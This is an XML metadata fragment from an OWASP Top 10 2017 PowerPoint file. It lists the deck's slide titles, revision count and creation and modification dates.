  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Design</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Folientitel</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>28</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="29" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Golden Master</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Foreword</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2017 Application Security Risks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Testing</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>What’s Next for Application Managers</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors</vt:lpstr>
      <vt:lpstr>Methodology and Data</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP</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Torsten</cp:lastModifiedBy>
  <cp:revision>1760</cp:revision>
  <cp:lastPrinted>2017-10-20T01:34:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-30T23:04:55Z</dcterms:modified>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>